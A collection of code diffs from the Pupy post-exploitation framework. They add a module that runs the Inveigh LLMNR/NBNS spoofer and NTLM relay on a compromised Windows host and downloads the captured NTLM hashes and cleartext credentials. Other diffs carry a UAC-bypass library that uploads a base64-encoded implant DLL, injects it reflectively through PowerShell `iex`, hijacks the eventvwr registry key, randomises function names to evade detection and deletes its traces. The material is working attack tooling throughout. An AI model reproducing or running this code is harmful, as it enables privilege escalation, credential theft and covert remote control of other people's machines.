+        :console_loop while((($inveigh.running -or $inveigh.relay_running -or $inveigh.unprivileged_running) -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output))
+        {
+
+            while($inveigh.console_queue.Count -gt 0)
+            {
+
+                if($inveigh.output_stream_only)
+                {
+                    Write-Output($inveigh.console_queue[0] + $inveigh.newline)
+                    $inveigh.console_queue.RemoveAt(0)
+                }
+                else
+                {
+
+                    switch -wildcard ($inveigh.console_queue[0])
+                    {
+                          
+                        "* written to *"
+                        {
+
+                            if($inveigh.file_output)
+                            {
+                                Write-Warning $inveigh.console_queue[0]
+                            }
+
+                            $inveigh.console_queue.RemoveAt(0)
+                        }
+
+                        "* for relay *"
+                        {
+                            Write-Warning $inveigh.console_queue[0]
+                            $inveigh.console_queue.RemoveAt(0)
+                        }
+
+                        "*SMB relay *"
+                        {
+                            Write-Warning $inveigh.console_queue[0]
+                            $inveigh.console_queue.RemoveAt(0)
+                        }
+
+                        "* local administrator *"
+                        {
+                            Write-Warning $inveigh.console_queue[0]
+                            $inveigh.console_queue.RemoveAt(0)
+                        }
+
+                        default
+                        {
+                            Write-Output $inveigh.console_queue[0]
+                            $inveigh.console_queue.RemoveAt(0)
+                        }
+
+                    }
+
+                }
+                             
+            }
+
+            if([Console]::KeyAvailable)
+            {
+                $inveigh.console_output = $false
+                BREAK console_loop
+            }
+
+            Start-Sleep -m 5
+        }
+
+    }
+    else
+    {
+        Write-Output "Inveigh isn't running"
+    }
+
+}
+else
+{
+    Write-Output "Watch-Inveigh cannot be used with current external tool selection"
+}
+
+}
+
+function Clear-Inveigh
+{
+<#
+.SYNOPSIS
+Clear-Inveigh will clear Inveigh data from memory.
+#>
+
+if($inveigh)
+{
+
+    if(!$inveigh.running -and !$inveigh.relay_running -and !$inveigh.unprivileged_running)
+    {
+        Remove-Variable inveigh -scope global
+        Write-Output "Inveigh data has been cleared from memory"
+    }
+    else
+    {
+        Write-Output "Run Stop-Inveigh before running Clear-Inveigh"
+    }
+
+}
+
+}

--- a/pupy/modules/bypassuac.py
+++ b/pupy/modules/bypassuac.py
@@ -20,30 +20,30 @@ class BypassUAC(PupyModule):
         self.arg_parser.add_argument('-m', dest='method', choices=["eventvwr", "dll_hijacking"], default=None, help="Default: the technic will be choosen for you. 'dll_hijacking' for wind7-8.1 and 'eventvwr' for wind7-10.")
 
     def run(self, args):
-		# check if a UAC Bypass can be done
-		if not self.client.conn.modules["pupwinutils.security"].can_get_admin_access():
-			self.error('Your are not on the local administrator group.')
-			return
+        # check if a UAC Bypass can be done
+        if not self.client.conn.modules["pupwinutils.security"].can_get_admin_access():
+            self.error('Your are not on the local administrator group.')
+            return
 
-		dll_hijacking = False
-		registry_hijacking = False
+        dll_hijacking = False
+        registry_hijacking = False
 
-		bypassUasModule = bypassuac(self, rootPupyPath=ROOT)
-		# choose methods depending on the OS Version
-		if not args.method:
-			if self.client.desc['release'] == '10':
-				registry_hijacking = True
-			else:
-				dll_hijacking = True
-		elif args.method == "eventvwr":		
-			registry_hijacking = True
-		else:
-			dll_hijacking = True
+        bypassUasModule = bypassuac(self, rootPupyPath=ROOT)
+        # choose methods depending on the OS Version
+        if not args.method:
+            if self.client.desc['release'] == '10':
+                registry_hijacking = True
+            else:
+                dll_hijacking = True
+        elif args.method == "eventvwr":     
+            registry_hijacking = True
+        else:
+            dll_hijacking = True
 
-		if registry_hijacking:
-			self.success("Trying to bypass UAC using the Eventvwr method, wind7-10 targets...")
-			bypassUasModule.bypassuac_through_EventVwrBypass()
-		elif dll_hijacking:
-			# Invoke-BypassUAC.ps1 uses different technics to bypass depending on the Windows Version (Sysprep for Windows 7/2008 and NTWDBLIB.dll for Windows 8/2012)
-			self.success("Trying to bypass UAC using DLL Hijacking, wind7-8.1 targets...")
-			bypassUasModule.bypassuac_through_PowerSploitBypassUAC()
+        if registry_hijacking:
+            self.success("Trying to bypass UAC using the Eventvwr method, wind7-10 targets...")
+            bypassUasModule.bypassuac_through_EventVwrBypass()
+        elif dll_hijacking:
+            # Invoke-BypassUAC.ps1 uses different technics to bypass depending on the Windows Version (Sysprep for Windows 7/2008 and NTWDBLIB.dll for Windows 8/2012)
+            self.success("Trying to bypass UAC using DLL Hijacking, wind7-8.1 targets...")
+            bypassUasModule.bypassuac_through_PowerSploitBypassUAC()

--- a/pupy/modules/inveigh.py
+++ b/pupy/modules/inveigh.py
@@ -1,0 +1,207 @@
+# -*- coding: UTF8 -*-
+#Author: @bobsecq
+#Contributor(s):
+
+#Use these followings scripts:
+# - https://github.com/Kevin-Robertson/Inveigh/blob/master/Scripts/Inveigh-Unprivileged.ps1
+# - https://github.com/Kevin-Robertson/Inveigh/blob/master/Scripts/Inveigh.ps1
+# - https://github.com/Kevin-Robertson/Inveigh/blob/master/Scripts/Inveigh-Relay.ps1
+# Thank you very much @Kevin-Robertson (https://github.com/Kevin-Robertson) for this very good project!
+
+from pupylib.PupyModule import *
+from modules.lib.windows.powershell_upload import execute_powershell_script
+from rpyc.utils.classic import download
+import os, ntpath
+
+__class_name__="Inveigh"
+ROOT=os.path.abspath(os.path.join(os.path.dirname(__file__),".."))
+
+@config(compat="windows", category="privesc")
+class Inveigh(PupyModule):
+    """ 
+        execute Inveigh commands
+    """
+    DEFAULT_REMOTE_FOLDER = "%TMP%"
+    LOG_OUT_FILE = "Inveigh-Log.txt"
+    NTLMV1_OUT_FILE = "Inveigh-NTLMv1.txt"
+    NTLMV2_OUT_FILE = "Inveigh-NTLMv2.txt"
+    CLEARTEXT_OUT_FILE = "Inveigh-Cleartext.txt"
+    
+    max_clients=1
+    
+    def init_argparse(self):
+        
+        commands_available = '''
+Information about start, start-unprivileged and start-relay:
+
+- 'start' command:
+    Invoke 'Invoke-Inveigh' function of Inveigh.ps1.
+    According to the official documentation: 
+        Invoke-Inveigh is a Windows PowerShell LLMNR/NBNS spoofer with the following features:
+        -> IPv4 LLMNR/NBNS spoofer with granular control
+        -> NTLMv1/NTLMv2 challenge/response capture over HTTP/HTTPS/SMB
+        -> Basic auth cleartext credential capture over HTTP/HTTPS
+        -> WPAD server capable of hosting a basic or custom wpad.dat file
+        -> HTTP/HTTPS server capable of hosting limited content
+
+- 'start-unprivileged' command:
+    Invoke 'Invoke-InveighUnprivileged' function of Inveigh-Unprivileged.ps1.
+    According to the official documentation: 
+        Invoke-InveighUnprivileged is a Windows PowerShell LLMNR/NBNS spoofer with the following features:
+        -> Local admin is not required for any feature
+        -> IPv4 NBNS spoofer with granular control that can be run with or without disabling the local NBNS service
+        -> IPv4 LLMNR spoofer with granular control that can be run only with the local LLMNR service disabled
+        -> Targeted IPv4 NBNS transaction ID brute force spoofer with granular control
+        -> NTLMv1/NTLMv2 challenge/response capture over HTTP
+        -> Basic auth cleartext credential capture over HTTP
+        -> WPAD server capable of hosting a basic or custom wpad.dat file
+        -> HTTP server capable of hosting limited content
+        This function contains only features that do not require local admin access. Note that there are caveats. 
+        A local firewall can still prevent traffic from reaching this function's listeners. Also, if LLMNR is 
+        enabled on the host, the LLMNR spoofer will not work. Both of these scenarios would still require local
+        admin access to change.
+    
+- 'start-relay' command:
+    Invoke 'Invoke-InveighRelay' function of Inveigh-Relay.ps1.
+    According to the official documentation: 
+        Invoke-InveighRelay currently supports NTLMv2 HTTP to SMB relay with psexec style command execution.
+        -> HTTP/HTTPS to SMB NTLMv2 relay with granular control
+        -> NTLMv1/NTLMv2 challenge/response capture over HTTP/HTTPS\n
+'''
+        
+        self.arg_parser = PupyArgumentParser(prog="Inveigh", description=self.__doc__, epilog=commands_available)
+        self.arg_parser.add_argument("-start", dest='InvokeInveigh', action='store_true', help='Invoke Windows PowerShell spoofer (local admin required)')
+        self.arg_parser.add_argument("-start-unprivileged", dest='InvokeInveighUnprivileged', action='store_true', help='Invoke Windows PowerShell spoofer (local admin not required)')
+        self.arg_parser.add_argument("-start-relay", dest='InvokeInveighRelay', action='store_true', help='Perform NTLMv2 HTTP to SMB relay')
+        self.arg_parser.add_argument("-stop", dest='StopInveigh', action='store_true', help='Stop all instances of Inveigh')
+        self.arg_parser.add_argument("-get-results", dest='getResults', action='store_true', help='Download Inveigh results')
+        self.arg_parser.add_argument("-tmp-out-folder", dest='tmpOutFolder', default=self.DEFAULT_REMOTE_FOLDER, help='Define remote temp folder (default: %(default)s)')
+        self.arg_parser.add_argument('-output-folder', dest='localOutputFolder', default='output', help="Folder which will contain results (default: %(default)s)")
+        self.arg_parser.add_argument('-inveigh-params', dest='inveighParams', default='', help="Use Inveigh parameters (ex: -SpooferIP, -HTTP, -Inspect). See official Inveigh doc.")
+        
+    def printFile(self, fname):
+        '''
+        '''
+        with open(fname, 'rb') as f:
+            lines = f.read()
+            print lines  
+             
+    def downloadInveighFiles (self, remote_temp_folder, localFolder):
+        '''
+        '''
+        nb = 0
+        if self.client.conn.modules['os.path'].isfile(self.path_log_out_file):
+            out_file = os.path.join(localFolder, self.LOG_OUT_FILE)
+            self.success("Downloading Inveigh log file in {0}".format(out_file))
+            download(self.client.conn, self.path_log_out_file, out_file)
+            self.printFile(out_file)
+            nb += 1
+        if self.client.conn.modules['os.path'].isfile(self.path_ntlmv1_out_file):
+            out_file = os.path.join(localFolder, self.NTLMV1_OUT_FILE)
+            self.success("Downloading Inveigh ntlmv1 file in {0}".format(out_file))
+            download(self.client.conn, self.path_ntlmv1_out_file, out_file)
+            self.printFile(out_file)
+            nb += 1
+        if self.client.conn.modules['os.path'].isfile(self.path_ntlmv2_out_file):
+            out_file = os.path.join(localFolder, self.NTLMV2_OUT_FILE)
+            self.success("Downloading Inveigh ntlmv2 file in {0}".format(out_file))
+            download(self.client.conn, self.path_ntlmv2_out_file, out_file)
+            self.printFile(out_file)
+            nb += 1
+        if self.client.conn.modules['os.path'].isfile(self.path_cleartext_out_file):
+            out_file = os.path.join(localFolder, self.CLEARTEXT_OUT_FILE)
+            self.success("Downloading Inveigh cleartext file in {0}".format(out_file))
+            download(self.client.conn, self.path_cleartext_out_file, out_file)
+            self.printFile(out_file)
+            nb += 1
+        return nb
+            
+    def removeRemoteInveighFiles(self):
+        '''
+        '''
+        self.success("Removing remote temp files")
+        if self.client.conn.modules['os.path'].isfile(self.path_log_out_file):
+            logging.debug('Removing the file {0}'.format(self.path_log_out_file))
+            self.client.conn.modules['os'].remove(self.path_log_out_file)
+        if self.client.conn.modules['os.path'].isfile(self.path_ntlmv1_out_file):
+            logging.debug('Removing the file {0}'.format(self.path_ntlmv1_out_file))
+            self.client.conn.modules['os'].remove(self.path_ntlmv1_out_file)
+        if self.client.conn.modules['os.path'].isfile(self.path_ntlmv2_out_file):
+            logging.debug('Removing the file {0}'.format(self.path_ntlmv2_out_file))
+            self.client.conn.modules['os'].remove(self.path_ntlmv2_out_file)
+        if self.client.conn.modules['os.path'].isfile(self.path_cleartext_out_file):
+            logging.debug('Removing the file {0}'.format(self.path_cleartext_out_file))
+            self.client.conn.modules['os'].remove(self.path_cleartext_out_file)
+    
+    def generateAndCreateLocalFolder (self, localFolder):
+        '''
+        '''
+        localFolder = os.path.join(localFolder, "{0}-{1}-{2}".format(self.client.desc['hostname'], self.client.desc['user'], self.client.desc['macaddr'].replace(':','')), "inveigh")
+        if not os.path.exists(localFolder):
+            logging.debug("Creating the {0} folder locally".format(localFolder))
+            os.makedirs(localFolder)
+        return localFolder
+    
+    def run(self, args):
+        script = 'inveigh'
+        pathToScript, command, remote_temp_folder = "", "", ""
+        if args.tmpOutFolder == self.DEFAULT_REMOTE_FOLDER:
+            remote_temp_folder = self.client.conn.modules['os.path'].expandvars("%TEMP%")
+        else:
+            remote_temp_folder = args.tmpOutFolder
+        logging.debug('{0} used for saving real time results on the target'.format(remote_temp_folder))
+        commonOptions = " -Tool 1 -FileOutput Y -OutputDir {0} ".format(remote_temp_folder)
+        logging.debug("These folowing Inveigh parameters will be given by default: {0}".format(commonOptions))
+        
+        self.path_log_out_file = ntpath.join(remote_temp_folder, self.LOG_OUT_FILE)
+        self.path_ntlmv1_out_file = ntpath.join(remote_temp_folder, self.NTLMV1_OUT_FILE)
+        self.path_ntlmv2_out_file = ntpath.join(remote_temp_folder, self.NTLMV2_OUT_FILE)
+        self.path_cleartext_out_file = ntpath.join(remote_temp_folder, self.CLEARTEXT_OUT_FILE)
+        
+        localFolder = self.generateAndCreateLocalFolder(args.localOutputFolder)
+        
+        if args.InvokeInveigh == False and args.InvokeInveighUnprivileged == False and args.InvokeInveighRelay == False and args.StopInveigh == False and args.getResults == False:
+            self.error("You have to give a command")
+            return
+        
+        if args.getResults == True:
+            nb = self.downloadInveighFiles(remote_temp_folder, localFolder)
+            if nb == 0:
+                self.error("No one Inveigh result file downloaded. Is Inveigh is running on the target?")
+            else:
+                self.success("All Inveigh results downloaded")
+            return
+        elif args.InvokeInveigh == True:
+            self.success("Invoke-Inveigh command selected")
+            pathToScript = os.path.join(ROOT, "external", "Inveigh", "Inveigh.ps1")
+            command = "Invoke-Inveigh"+commonOptions+args.inveighParams
+        elif args.InvokeInveighUnprivileged == True:
+            self.success("Invoke-InveighUnprivileged command selected")
+            pathToScript = os.path.join(ROOT, "external", "Inveigh", "Inveigh-Unprivileged.ps1")
+            command = "Invoke-InveighUnprivileged"+commonOptions+args.inveighParams
+        elif args.InvokeInveighRelay == True:
+            self.success("Invoke-Relay command selected")
+            pathToScript = os.path.join(ROOT, "external", "Inveigh", "Inveigh-Relay.ps1")
+            command = "Invoke-Relay"+commonOptions+args.inveighParams
+        elif args.StopInveigh == True:
+            pathToScript = os.path.join(ROOT, "external", "Inveigh", "Inveigh.ps1")
+            command = "Stop-Inveigh"
+        logging.debug("The following script will be loaded on the target if needed: {0}".format(pathToScript))
+        for arch in ['x64', 'x86']:
+            logging.debug("Powershell script actually loaded: {0}".format(self.client.powershell[arch]['scripts_loaded']))
+            if script not in self.client.powershell[arch]['scripts_loaded']:
+                logging.debug("Loading {0} script on target...".format(pathToScript))
+                content = open(pathToScript, 'r').read()
+            else:
+                logging.debug("{0} script already loaded on target".format(pathToScript))
+                content = ''
+        logging.debug("Executing the following inveigh command: {0}".format(command))
+        output = execute_powershell_script(self, content, command, x64IfPossible=True, script_name=script)
+        if not output:
+            self.error("No results")
+            return
+        self.success("Output: \n%s\n" % output)
+        if args.StopInveigh == True and "exited at " in str(output):
+            self.success("Inveigh is stopped")
+            self.downloadInveighFiles(remote_temp_folder, localFolder)
+            self.removeRemoteInveighFiles()

--- a/pupy/modules/lib/windows/bypassuac.py
+++ b/pupy/modules/lib/windows/bypassuac.py
@@ -15,122 +15,125 @@ import random, string
 from pupylib.utils.rpyc_utils import redirected_stdo
 
 class bypassuac():
-	
-	def __init__(self, module, rootPupyPath):
-		self.module = module
-		self.module.client.load_package("pupwinutils.bypassuac_remote")
+    
+    def __init__(self, module, rootPupyPath):
+        self.module = module
+        self.module.client.load_package("pupwinutils.bypassuac_remote")
 
-		#Remote paths
-		remoteTempFolder, systemRoot = self.module.client.conn.modules["pupwinutils.bypassuac_remote"].get_env_variables()
-		
-		self.invokeReflectivePEInjectionRemotePath = "{temp}{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.txt')
-		self.mainPowershellScriptRemotePath = "{temp}{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.ps1')
-		self.pupyDLLRemotePath = "{temp}{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.txt')
-		self.invokeBypassUACRemotePath = "{temp}{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.ps1')
-		
-		#Adding obfuscation on ps1 main function
-		self.bypassUAC_random_name = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(7))
-		self.reflectivePE_random_name = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(7))
+        #Remote paths
+        remoteTempFolder, systemRoot = self.module.client.conn.modules["pupwinutils.bypassuac_remote"].get_env_variables()
+        
+        self.invokeReflectivePEInjectionRemotePath = "{temp}{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.txt')
+        self.mainPowershellScriptRemotePath = "{temp}{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.ps1')
+        self.pupyDLLRemotePath = "{temp}{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.txt')
+        self.invokeBypassUACRemotePath = "{temp}{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.ps1')
+        
+        #Adding obfuscation on ps1 main function
+        self.bypassUAC_random_name = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(7))
+        self.reflectivePE_random_name = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(7))
 
-		#Define Local paths
-		self.pupyDLLLocalPath = os.path.join(gettempdir(),'dllFile.txt')
-		self.mainPowerShellScriptPrivilegedLocalPath = os.path.join(gettempdir(),'mainPowerShellScriptPrivileged.txt')
-		self.invokeReflectivePEInjectionLocalPath = os.path.join(rootPupyPath,"pupy", "external", "PowerSploit", "CodeExecution", "Invoke-ReflectivePEInjection.ps1")
-		self.invokeBypassUACLocalPath = os.path.join(rootPupyPath, "pupy", "external", "Empire", "privesc", "Invoke-BypassUAC.ps1")
-		
-			
-	def bypassuac_through_EventVwrBypass(self):
-		# 	'''
-		# 	Based on Invoke-EventVwrBypass, thanks to enigma0x3 (https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/)
-		# 	'''
-		
-		# On a Windows 10 "C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe" does not exist, we cannot force to use a x64 bit powershell interpreter
-		# The pupy dll upload will be a 32 bit
-		if '64' in self.module.client.desc['proc_arch']:
-			upload_x86_dll = False
-		else:
-			upload_x86_dll = True
-		self.module.info('Uploading temporary files')
-		self.uploadPupyDLL(force_x86_dll=upload_x86_dll)
-		self.uploadPowershellScripts()
-		files_to_delete=[self.invokeReflectivePEInjectionRemotePath, self.mainPowershellScriptRemotePath, self.pupyDLLRemotePath]
-		self.module.info('Altering the registry')
-		self.module.client.conn.modules["pupwinutils.bypassuac_remote"].registry_hijacking(self.mainPowershellScriptRemotePath, files_to_delete)
-		
-		self.module.success("Waiting for a connection from the DLL (take few seconds)...")
-		
-	def bypassuac_through_PowerSploitBypassUAC(self):
-		'''
-		Performs a bypass UAC attack by utilizing the powersloit UACBypass script (wind7 to 8.1)
-		'''
-		#Constants
-		bypassUACcmd = "{InvokeBypassUAC} -Command 'powershell.exe -ExecutionPolicy Bypass -file {mainPowershell} -Verbose'".format(InvokeBypassUAC=self.bypassUAC_random_name, mainPowershell=self.mainPowershellScriptRemotePath)
-		self.module.info('Uploading temporary files')
-		self.uploadPowershellScripts()
-		self.uploadPupyDLL()
-		content = re.sub("Write-Verbose ","Write-Output ", open(self.invokeBypassUACLocalPath, 'r').read(), flags=re.I)
-		content = re.sub("Invoke-BypassUAC", self.bypassUAC_random_name, content, flags=re.I)
-		logging.debug("Starting BypassUAC script with the following cmd: {0}".format(bypassUACcmd))
-		self.module.info('Starting the UAC Bypass process')
-		output = execute_powershell_script(self.module, content, bypassUACcmd, x64IfPossible=True)
-		logging.debug("BypassUAC script output: %s\n"%(output))
-		
-		if "DLL injection complete!" in output:
-			self.module.success("UAC bypassed")
-		else:
-			self.module.warning("Impossible to know what's happened remotely. You should active debug mode.")
-		
-		#Clean tmp files
-		tmp_files = [self.invokeReflectivePEInjectionRemotePath, self.mainPowershellScriptRemotePath, self.invokeBypassUACRemotePath, self.pupyDLLRemotePath]
-		logging.debug("Deleting temporary files")
-		self.module.client.conn.modules["pupwinutils.bypassuac_remote"].deleteTHisRemoteFile(tmp_files)
-		
-		#...
-		self.module.success("Waiting for a connection from the DLL (take few seconds)...")
-		
-	def uploadPowershellScripts(self):
-		'''
-		Upload main powershell script and invokeReflectivePEInjection script
-		'''
-		mainPowerShellScriptPrivileged = """
-		cat {invoke_reflective_pe_injection} | Out-String  | iex
-		cat {pupy_dll} | Out-String  | iex
-		{InvokeReflectivePEInjection} -PEBytes $PEBytes -ForceASLR
-		""".format(invoke_reflective_pe_injection=self.invokeReflectivePEInjectionRemotePath, pupy_dll=self.pupyDLLRemotePath, InvokeReflectivePEInjection=self.reflectivePE_random_name)
-		
-		logging.debug("Creating the Powershell script in %s locally"%(self.mainPowerShellScriptPrivilegedLocalPath))
-		with open(self.mainPowerShellScriptPrivilegedLocalPath, 'w+') as w:
-			w.write(mainPowerShellScriptPrivileged)
-		
-		logging.debug("Uploading powershell code for DLL injection in {0}".format(self.invokeReflectivePEInjectionRemotePath))
-		content = re.sub("Invoke-ReflectivePEInjection", self.reflectivePE_random_name, open(self.invokeReflectivePEInjectionLocalPath).read(), flags=re.I)
-		tmp_file = os.path.join(gettempdir(),'reflective_pe.txt')
-		with open(tmp_file, 'w+') as w:
-			w.write(content)
-		upload(self.module.client.conn, tmp_file, self.invokeReflectivePEInjectionRemotePath)
-		
-		logging.debug("Uploading main powershell script executed by BypassUAC in {0}".format(self.mainPowershellScriptRemotePath))
-		upload(self.module.client.conn, self.mainPowerShellScriptPrivilegedLocalPath, self.mainPowershellScriptRemotePath)
+        #Define Local paths
+        self.pupyDLLLocalPath = os.path.join(gettempdir(),'dllFile.txt')
+        self.mainPowerShellScriptPrivilegedLocalPath = os.path.join(gettempdir(),'mainPowerShellScriptPrivileged.txt')
+        self.invokeReflectivePEInjectionLocalPath = os.path.join(rootPupyPath,"pupy", "external", "PowerSploit", "CodeExecution", "Invoke-ReflectivePEInjection.ps1")
+        self.invokeBypassUACLocalPath = os.path.join(rootPupyPath, "pupy", "external", "Empire", "privesc", "Invoke-BypassUAC.ps1")
+        
+            
+    def bypassuac_through_EventVwrBypass(self):
+        #   '''
+        #   Based on Invoke-EventVwrBypass, thanks to enigma0x3 (https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/)
+        #   '''
+        
+        # On a Windows 10 "C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe" does not exist, we cannot force to use a x64 bit powershell interpreter
+        # The pupy dll upload will be a 32 bit
+        print repr(self.module.client.desc)
+        if '64' in self.module.client.desc['proc_arch']:
+            upload_x86_dll = False
+        else:
+            upload_x86_dll = True
+        self.module.info('Uploading temporary files')
+        self.uploadPupyDLL(force_x86_dll=upload_x86_dll)
+        self.uploadPowershellScripts()
+        files_to_delete=[self.invokeReflectivePEInjectionRemotePath, self.mainPowershellScriptRemotePath, self.pupyDLLRemotePath]
+        self.module.info('Altering the registry')
+        self.module.client.conn.modules["pupwinutils.bypassuac_remote"].registry_hijacking(self.mainPowershellScriptRemotePath, files_to_delete)
+        
+        self.module.success("Waiting for a connection from the DLL (take few seconds)...")
+        self.module.success("If nothing happened, try to migrate to another process and try again.")
+        
+    def bypassuac_through_PowerSploitBypassUAC(self):
+        '''
+        Performs a bypass UAC attack by utilizing the powersloit UACBypass script (wind7 to 8.1)
+        '''
+        #Constants
+        bypassUACcmd = "{InvokeBypassUAC} -Command 'powershell.exe -ExecutionPolicy Bypass -file {mainPowershell} -Verbose'".format(InvokeBypassUAC=self.bypassUAC_random_name, mainPowershell=self.mainPowershellScriptRemotePath)
+        self.module.info('Uploading temporary files')
+        self.uploadPowershellScripts()
+        self.uploadPupyDLL()
+        content = re.sub("Write-Verbose ","Write-Output ", open(self.invokeBypassUACLocalPath, 'r').read(), flags=re.I)
+        content = re.sub("Invoke-BypassUAC", self.bypassUAC_random_name, content, flags=re.I)
+        logging.debug("Starting BypassUAC script with the following cmd: {0}".format(bypassUACcmd))
+        self.module.info('Starting the UAC Bypass process')
+        output = execute_powershell_script(self.module, content, bypassUACcmd, x64IfPossible=True)
+        logging.debug("BypassUAC script output: %s\n"%(output))
+        
+        if "DLL injection complete!" in output:
+            self.module.success("UAC bypassed")
+        else:
+            self.module.warning("Impossible to know what's happened remotely. You should active debug mode.")
+        
+        #Clean tmp files
+        tmp_files = [self.invokeReflectivePEInjectionRemotePath, self.mainPowershellScriptRemotePath, self.invokeBypassUACRemotePath, self.pupyDLLRemotePath]
+        logging.debug("Deleting temporary files")
+        self.module.client.conn.modules["pupwinutils.bypassuac_remote"].deleteTHisRemoteFile(tmp_files)
+        
+        #...
+        self.module.success("Waiting for a connection from the DLL (take few seconds)...")
+        self.module.success("If nothing happened, try to migrate to another process and try again.")
+        
+    def uploadPowershellScripts(self):
+        '''
+        Upload main powershell script and invokeReflectivePEInjection script
+        '''
+        mainPowerShellScriptPrivileged = """
+        cat {invoke_reflective_pe_injection} | Out-String  | iex
+        cat {pupy_dll} | Out-String  | iex
+        {InvokeReflectivePEInjection} -PEBytes $PEBytes -ForceASLR
+        """.format(invoke_reflective_pe_injection=self.invokeReflectivePEInjectionRemotePath, pupy_dll=self.pupyDLLRemotePath, InvokeReflectivePEInjection=self.reflectivePE_random_name)
+        
+        logging.debug("Creating the Powershell script in %s locally"%(self.mainPowerShellScriptPrivilegedLocalPath))
+        with open(self.mainPowerShellScriptPrivilegedLocalPath, 'w+') as w:
+            w.write(mainPowerShellScriptPrivileged)
+        
+        logging.debug("Uploading powershell code for DLL injection in {0}".format(self.invokeReflectivePEInjectionRemotePath))
+        content = re.sub("Invoke-ReflectivePEInjection", self.reflectivePE_random_name, open(self.invokeReflectivePEInjectionLocalPath).read(), flags=re.I)
+        tmp_file = os.path.join(gettempdir(),'reflective_pe.txt')
+        with open(tmp_file, 'w+') as w:
+            w.write(content)
+        upload(self.module.client.conn, tmp_file, self.invokeReflectivePEInjectionRemotePath)
+        
+        logging.debug("Uploading main powershell script executed by BypassUAC in {0}".format(self.mainPowershellScriptRemotePath))
+        upload(self.module.client.conn, self.mainPowerShellScriptPrivilegedLocalPath, self.mainPowershellScriptRemotePath)
 
-	def uploadPupyDLL(self, force_x86_dll=False):
-		'''
-		Upload pupy dll as a txt file
-		'''
-		res=self.module.client.conn.modules['pupy'].get_connect_back_host()
-		host, port = res.rsplit(':',1)
-		logging.debug("Address configured is %s:%s for pupy dll..."%(host,port))
-		logging.debug("Looking for process architecture...")
+    def uploadPupyDLL(self, force_x86_dll=False):
+        '''
+        Upload pupy dll as a txt file
+        '''
+        res=self.module.client.conn.modules['pupy'].get_connect_back_host()
+        host, port = res.rsplit(':',1)
+        logging.debug("Address configured is %s:%s for pupy dll..."%(host,port))
+        logging.debug("Looking for process architecture...")
 
-		if "64" in self.module.client.desc["os_arch"] and not force_x86_dll:
-			logging.debug("Target achitecture is x64, using a x64 dll")
-			dllbuff=pupygen.get_edit_pupyx64_dll(self.module.client.get_conf())
-		else:
-			logging.debug("Target achitecture is x86, using a x86 dll")
-			dllbuff=pupygen.get_edit_pupyx86_dll(self.module.client.get_conf())
-		
-		logging.debug("Creating the pupy dll in %s locally"%(self.pupyDLLLocalPath))
-		with open(self.pupyDLLLocalPath, 'w+') as w:
-			w.write('$PEBytes = [System.Convert]::FromBase64String("%s")'%(base64.b64encode(dllbuff)))
-		
-		logging.debug("Uploading pupy dll in {0}".format(self.pupyDLLRemotePath))
-		upload(self.module.client.conn, self.pupyDLLLocalPath, self.pupyDLLRemotePath)
+        if "64" in self.module.client.desc["os_arch"] and not force_x86_dll:
+            logging.debug("Target achitecture is x64, using a x64 dll")
+            dllbuff=pupygen.get_edit_pupyx64_dll(self.module.client.get_conf())
+        else:
+            logging.debug("Target achitecture is x86, using a x86 dll")
+            dllbuff=pupygen.get_edit_pupyx86_dll(self.module.client.get_conf())
+        
+        logging.debug("Creating the pupy dll in %s locally"%(self.pupyDLLLocalPath))
+        with open(self.pupyDLLLocalPath, 'w+') as w:
+            w.write('$PEBytes = [System.Convert]::FromBase64String("%s")'%(base64.b64encode(dllbuff)))
+        
+        logging.debug("Uploading pupy dll in {0}".format(self.pupyDLLRemotePath))
+        upload(self.module.client.conn, self.pupyDLLLocalPath, self.pupyDLLRemotePath)

--- a/pupy/modules/lib/windows/bypassuac.py
+++ b/pupy/modules/lib/windows/bypassuac.py
@@ -46,7 +46,6 @@ class bypassuac():
         
         # On a Windows 10 "C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe" does not exist, we cannot force to use a x64 bit powershell interpreter
         # The pupy dll upload will be a 32 bit
-        print repr(self.module.client.desc)
         if '64' in self.module.client.desc['proc_arch']:
             upload_x86_dll = False
         else:

--- a/pupy/modules/outlook.py
+++ b/pupy/modules/outlook.py
@@ -39,7 +39,7 @@ class Outlook(PupyModule):
 		'''
 		self.client.load_package("outlook")
 		localFolder=args.localOutputFolder
-		self.localFolder = os.path.join(localFolder, "{0}-{1}-{2}".format(self.client.desc['hostname'].encode('utf-8'), self.client.desc['user'].encode('utf-8'), self.client.desc['macaddr'].encode('utf-8').replace(':','')))
+		self.localFolder = os.path.join(localFolder, "{0}-{1}-{2}".format(self.client.desc['hostname'], self.client.desc['user'], self.client.desc['macaddr'].replace(':','')))
 		if not os.path.exists(self.localFolder):
 			logging.debug("Creating the {0} folder locally".format(self.localFolder))
 			os.makedirs(self.localFolder)

--- a/pupy/network/lib/launchers/auto_proxy.py
+++ b/pupy/network/lib/launchers/auto_proxy.py
@@ -32,18 +32,16 @@ def parse_win_proxy(val):
     return l
 
 last_wpad=None
-def get_proxies(wpad_timeout=600, additional_proxies=[]):
+def get_proxies(wpad_timeout=600, additional_proxies=None):
     global last_wpad
 
-    for p in additional_proxies:
-        np=p
-        login=None
-        password=None
-        if "@" in np:
-            tab=p.split(":", 1)
+    if additional_proxies != None:
+        login, password = None, None
+        if "@" in additional_proxies:
+            tab=additional_proxies.split(":", 1)
             login, password=tab[0].split()
-            np=tab[1]
-        tab=np.split(":")
+            additional_proxies=tab[1]
